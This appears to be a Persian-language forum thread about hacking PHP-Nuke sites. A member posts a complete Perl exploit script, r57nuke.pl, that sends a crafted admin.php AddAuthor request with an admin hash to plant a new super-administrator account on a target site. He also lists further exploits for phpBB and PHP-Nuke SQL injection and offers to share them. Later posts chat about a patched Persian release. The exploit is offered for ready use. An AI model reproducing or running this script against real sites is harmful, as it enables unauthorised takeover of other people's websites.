سايتهاي نوك به اين روش هك ميشن !‌حتما ببينيد!!!!

ali_civil

Member
دوستان عزيز سلام
همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن 8O فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره :evil:
يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت.......... :(

اين نوع هك با استفاده ار SQL Injection انجام ميشه :(
اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك

#!/usr/bin/perl
# * r57nuke.pl *
# * php-nuke all versions and spaiz-nuke version < 1.2beta xploit *

use IO::Socket;


print "Enter host (e.g. www.phpnuke.com): \r\n";
chomp($server=<STDIN>);
# get new admin nick =)
print "Enter u nick (e.g. hacker): \r\n";
chomp($nick=<STDIN>);
# get new admin pass =)
print "Enter u pass (e.g. password): \r\n";
chomp($pass=<STDIN>);
# get admin hash =)
print "Enter hash (e.g. YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6): \r\n";
chomp($hash=<STDIN>);

$port="80";

$path="/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&[email protected]&add_pwd=$pass&admin=$hash";

print "\r\nConnecting... ";

$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp)
or die;

print "OK \r\n";
print "exploiting... ";

# send string to server

print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: $server/admin.php\n";
print $socket "User-Agent: r57spaiz\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "OK \r\n";
print "now u can go to $server/admin.php and just use login $nick and password $pass for access \r\n";
 

ali_civil

Member
روش هك تمام ورژنهاي نوك !! مهم مهم

دوستان عزيز اسكريپتهاي زير كه من فقط اسمشون رو ميبرم و اگر لازم باشه بعدا خود اسكريپتها رو هم ميدم
ميتونن پي اچ پي نوك و پي اچ پي بي بي رو به راحتي هك كرده و يك ادمين تعريف بكنند
---------------------------------------------------------------------------------------------------
r57phpbb-poc.pl
phpBB version <= 2.06 search_id sql injection exploit
-------------------------------------------------------------
- r57nuke.pl
Spaiz-nuke version < 1.2beta & PHP-nuke all versions "add_admin" exploit
-------------------------------------------------------------
r57nuke-cid.pl
PHP-Nuke version <= 6.9 'cid' sql injection exploit
------------------------------------------------------------
با اين وجود گاومون زاييد.......................... :arrow:
 

BeHnAm_akb

Active Member
آقا اين 7.1 فارسي كي مي آد البته بدون اين مشكلا؟
اوني كه آقاي شهابي زده رو ديدم
 

ali_civil

Member
شب و روز كار ميكنم !!!

سلام . دوستان . راستش من شب و روز كار مي كنم و همه باقها رو هم از لحاظ امنيتي بستم در نوك 7.1 ..... :( خيلي خستم كرده اما اگه تموم بشه همه چيز حل ميشه ... دعام كنيد
 

BeHnAm_akb

Active Member
ايشالا زود تر تموم مي شه فقط خواهشن كاري كن حجمش زياد بالا نره

منتظريم(به همراه طريقه آپگريد)
ممنون
 

جدیدترین ارسال ها

بالا